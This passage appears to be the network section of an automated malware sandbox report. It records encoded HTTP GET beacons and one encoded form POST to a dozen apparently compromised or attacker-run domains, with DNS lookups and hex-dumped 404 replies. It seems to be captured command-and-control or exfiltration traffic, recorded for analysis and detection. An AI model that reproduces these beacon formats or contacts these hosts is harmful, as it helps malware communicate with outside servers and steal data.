            Source: global trafficHTTP traffic detected: GET /vfca/?hH=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJ1CB2sMjpnb8Z8ua1HdSGi7DVkOqV+A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.dxgsf.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /gvk0/?4Z=FRPPB0TP0VK82R4&hH=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PfRrn1v/W9n6lJorEOJ3pO998ixm+1g== HTTP/1.1Host: www.dennisrosenberg.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.ennerdaledevcons.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /9285/?hH=z4MROtYNL8tsqryqYVwhIRiC1K/sXlb0hIiORiEdpZxgXp9iqAKh/lqcbyO1AV4s7Ir6nuLseD1viLy4mDmuUoJvGkxfj7PnqEMVCvhqUXK8NAJvVg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.artemhypnotherapy.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.mocar.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /csr7/?hH=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dGRiAFdG+fcQhNs0c0ksUo3k2Pm5jlw==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.evertudy.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /qmv1/?hH=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7au3WOdqnwjndnKZaLflLsZKJNqTutg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.luo918.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /dmjt/?hH=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnDtcmXgVOIWaf4rR9wPyv60N+q1PahQ==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.fungusbus.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /2dv8/?hH=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX26bwEMBx8euROh9Q+/yWsNbYiwZzEkA==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.qe1jqiste.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /n12h/?hH=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNlQw99SDhk98goSWR9PKXD7QtbF+D/w==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.thesprinklesontop.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R4 HTTP/1.1Host: www.stefanogaus.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficHTTP traffic detected: GET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1Host: www.highwavesmarine.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
            Source: global trafficDNS traffic detected: DNS query: www.highwavesmarine.com
            Source: global trafficDNS traffic detected: DNS query: www.dxgsf.shop
            Source: global trafficDNS traffic detected: DNS query: www.dennisrosenberg.studio
            Source: global trafficDNS traffic detected: DNS query: www.shoplifestylebrand.com
            Source: global trafficDNS traffic detected: DNS query: www.ennerdaledevcons.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.neworldelectronic.com
            Source: global trafficDNS traffic detected: DNS query: www.artemhypnotherapy.com
            Source: global trafficDNS traffic detected: DNS query: www.todosneaker.com
            Source: global trafficDNS traffic detected: DNS query: www.mocar.pro
            Source: global trafficDNS traffic detected: DNS query: www.evertudy.xyz
            Source: global trafficDNS traffic detected: DNS query: www.luo918.com
            Source: global trafficDNS traffic detected: DNS query: www.fungusbus.com
            Source: global trafficDNS traffic detected: DNS query: www.newzionocala.com
            Source: global trafficDNS traffic detected: DNS query: www.qe1jqiste.sbs
            Source: global trafficDNS traffic detected: DNS query: www.thesprinklesontop.com
            Source: global trafficDNS traffic detected: DNS query: www.stefanogaus.com
            Source: unknownHTTP traffic detected: POST /vfca/ HTTP/1.1Host: www.dxgsf.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeCache-Control: max-age=0Content-Length: 191Content-Type: application/x-www-form-urlencodedOrigin: http://www.dxgsf.shopReferer: http://www.dxgsf.shop/vfca/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 68 48 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 52 4c 63 4d 50 54 47 42 7a 6e 54 31 69 78 6e 6e 37 54 56 41 72 49 46 41 4c 69 6e 66 56 53 52 71 79 45 72 41 67 5a 51 49 35 78 4e 30 52 46 53 77 52 70 4b 48 5a 2f 46 42 39 2f 42 49 48 6d 65 6a 72 58 30 77 4d 35 52 73 35 52 31 63 67 4e 37 70 72 71 74 69 7a 2b 6d 6b 62 74 54 50 75 4a 50 51 73 75 79 4a 67 30 34 52 34 78 43 50 35 62 4f 70 65 74 46 36 34 6b 37 47 72 42 47 33 6d 65 37 61 58 65 48 52 50 44 4e 77 59 73 48 33 39 6b 61 4c 6f 39 76 6a 36 51 6a 4b 42 45 6a 36 4c 66 48 78 54 76 4b 48 6a 4e 2f 42 6e 33 54 5a 53 2f 6e 38 Data Ascii: hH=ChGtZ61rPNgdRLcMPTGBznT1ixnn7TVArIFALinfVSRqyErAgZQI5xN0RFSwRpKHZ/FB9/BIHmejrX0wM5Rs5R1cgN7prqtiz+mkbtTPuJPQsuyJg04R4xCP5bOpetF64k7GrBG3me7aXeHRPDNwYsH39kaLo9vj6QjKBEj6LfHxTvKHjN/Bn3TZS/n8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:53:25 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 06:53:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 39e_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"x-et-api-version: v1x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/x-et-api-origin: https://mocar.prox-tec-api-version: v1x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/x-tec-api-origin: https://mocar.prox-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 03 Jul 2024 06:55:02 GMTserver: LiteSpeedData Raw: 32 33 63 64 0d 0a f4 ff 1b 22 aa 6a 3d 14 51 d1 ea e1 88 d4 ac 1e 00 8d 94 85 f3 f7 8f d0 e1 73 de 97 99 66 6f eb f3 82 90 2a 0a 88 41 90 92 cf a2 82 39 ae 93 ae 14 44 36 29 d8 20 c0 00 ad cb 1c 26 d9 7d ff f3 b7 4c eb cf c9 e5 44 c5 b3 c4 3d 3c 45 a0 c5 b6 3c cb 96 dc fe da c7 bf a8 9e e0 49 62 82 80 06 64 cb ed ca 5f fb 55 96 0f b0 b1 11 96 d9 c5 45 a5 3c b0 ea d7 dd 62 e0 8b 03 a4 c9 ee 1d bf ee d7 30 b0 33 cb 78 77 b3 7b 04 ac 42 20 23 a3 81 58 01 1b 31 f2 ce c8 b8 c8 08 21 e3 ff b7 d6 a7 30 11 2a c2 46 e9 58 55 af aa 02 f3 43 88 0f aa aa 3f ce 0f 01 f9 3d ab f6 c4 45 8a ac 0a 91 34 dd b7 82 d3 61 9c 0d ab 25 f0 2e ec b3 0c a7 53 b9 94 18 41 d3 7f 05 fa 18 aa fd 2f 0a 08 4a 13 c1 d4 cd 64 a8 d9 7c 77 66 07 76 6c 0e 81 10 5b f0 ba 5f f2 4d fe 58 63 67 7b af ba 78 45 7b 9b be 7b f5 19 07 b5 a5 c5 59 ab b5 0e 11 50 d1 25 bf 4b b7 3c 4e 77 a0 68 54 89 a3 c2 88 65 a8 27 28 c6 45 04 59 cc fb 34 69 ac b4 05 35 a7 f4 fe 59 e3 6e 48 00 ab 68 1f 7c 63 2c fc a9 e2 38 62 91 65 6d d7 b7 d2 87 36 db 37 2e 9b 23 fe 4e d0 a0 85 3b 1f 31 78 a7 89 33 40 6e 7d 44 fd df ff 35 b9 75 da c2 ad f1 4e 93 e4 b7 cb c5 7c be 24 af 7d a5 83 ec 83 6f fc 4c fd 53 d3 2c b3 e0 57 1e e3 4c f8 2a 33 e7 07 dd 3f 54 10 e7 db 8a cb 9a 91 ec ce 44 d6 ac 59 ed 62 3a 58 fb c1 58 ad 67 02 0f 9d 65 59 c7 49 87 52 00 1a 0a 4b 5b 69 34 de 65 a1 21 e5 0d 48 0b 6f ef 2d 79 a9 9d fe ef ff e4 96 ec 7a 13 75 67 54 24 79 ff 37 66 0d 40 9d 51 09 d6 ff 8d ef c0 a1 0e b7 62 88 28 e7 42 9e b1 08 7b cc 62 aa e9 7b 7d 9a 87 da 92 27 00 35 f7 e3 d8 1d 6a 1d 6e c1 19 9d dd 35 95 b6 6a 2e 41 34 36 be 50 ec ce 64 1c fc 4f f0 cf 5d 0f 9d bf 36 1f 01 d1 b8 36 12 45 06 ba d2 11 3e 07 4b 0b 5f ed b4 cc ca 2c ca 9d Data Ascii: 23cd"j=Qsfo*A9D6) &}LD=<E<Ibd_UE<b03xw{B #X1!0*FXUC?=E4a%.SA/Jd|wfvl[_MXcg{xE{{YP%K<NwhTe'(EY4i5YnHh|c,8bem67.#N;1x3@n}D5uN|$}oLS,WL*3?TDYb:XXgeYIRK[i4e!Ho-yzugT$y7f@Qb(B{b{}'5jn5j.A46PdO]66E>K_,
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 39e_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"x-et-api-version: v1x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/x-et-api-origin: https://mocar.prox-tec-api-version: v1x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/x-tec-api-origin: https://mocar.prox-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 03 Jul 2024 06:55:04 GMTserver: LiteSpeedData Raw: 32 33 63 64 0d 0a f4 ff 1b 22 aa 6a 3d 14 51 d1 ea e1 88 d4 ac 1e 00 8d 94 85 f3 f7 8f d0 e1 73 de 97 99 66 6f eb f3 82 90 2a 0a 88 41 90 92 cf a2 82 39 ae 93 ae 14 44 36 29 d8 20 c0 00 ad cb 1c 26 d9 7d ff f3 b7 4c eb cf c9 e5 44 c5 b3 c4 3d 3c 45 a0 c5 b6 3c cb 96 dc fe da c7 bf a8 9e e0 49 62 82 80 06 64 cb ed ca 5f fb 55 96 0f b0 b1 11 96 d9 c5 45 a5 3c b0 ea d7 dd 62 e0 8b 03 a4 c9 ee 1d bf ee d7 30 b0 33 cb 78 77 b3 7b 04 ac 42 20 23 a3 81 58 01 1b 31 f2 ce c8 b8 c8 08 21 e3 ff b7 d6 a7 30 11 2a c2 46 e9 58 55 af aa 02 f3 43 88 0f aa aa 3f ce 0f 01 f9 3d ab f6 c4 45 8a ac 0a 91 34 dd b7 82 d3 61 9c 0d ab 25 f0 2e ec b3 0c a7 53 b9 94 18 41 d3 7f 05 fa 18 aa fd 2f 0a 08 4a 13 c1 d4 cd 64 a8 d9 7c 77 66 07 76 6c 0e 81 10 5b f0 ba 5f f2 4d fe 58 63 67 7b af ba 78 45 7b 9b be 7b f5 19 07 b5 a5 c5 59 ab b5 0e 11 50 d1 25 bf 4b b7 3c 4e 77 a0 68 54 89 a3 c2 88 65 a8 27 28 c6 45 04 59 cc fb 34 69 ac b4 05 35 a7 f4 fe 59 e3 6e 48 00 ab 68 1f 7c 63 2c fc a9 e2 38 62 91 65 6d d7 b7 d2 87 36 db 37 2e 9b 23 fe 4e d0 a0 85 3b 1f 31 78 a7 89 33 40 6e 7d 44 fd df ff 35 b9 75 da c2 ad f1 4e 93 e4 b7 cb c5 7c be 24 af 7d a5 83 ec 83 6f fc 4c fd 53 d3 2c b3 e0 57 1e e3 4c f8 2a 33 e7 07 dd 3f 54 10 e7 db 8a cb 9a 91 ec ce 44 d6 ac 59 ed 62 3a 58 fb c1 58 ad 67 02 0f 9d 65 59 c7 49 87 52 00 1a 0a 4b 5b 69 34 de 65 a1 21 e5 0d 48 0b 6f ef 2d 79 a9 9d fe ef ff e4 96 ec 7a 13 75 67 54 24 79 ff 37 66 0d 40 9d 51 09 d6 ff 8d ef c0 a1 0e b7 62 88 28 e7 42 9e b1 08 7b cc 62 aa e9 7b 7d 9a 87 da 92 27 00 35 f7 e3 d8 1d 6a 1d 6e c1 19 9d dd 35 95 b6 6a 2e 41 34 36 be 50 ec ce 64 1c fc 4f f0 cf 5d 0f 9d bf 36 1f 01 d1 b8 36 12 45 06 ba d2 11 3e 07 4b 0b 5f ed b4 cc ca 2c ca 9d Data Ascii: 23cd"j=Qsfo*A9D6) &}LD=<E<Ibd_UE<b03xw{B #X1!0*FXUC?=E4a%.SA/Jd|wfvl[_MXcg{xE{{YP%K<NwhTe'(EY4i5YnHh|c,8bem67.#N;1x3@n}D5uN|$}oLS,WL*3?TDYb:XXgeYIRK[i4e!Ho-yzugT$y7f@Qb(B{b{}'5jn5j.A46PdO]66E>K_,
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:55:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html 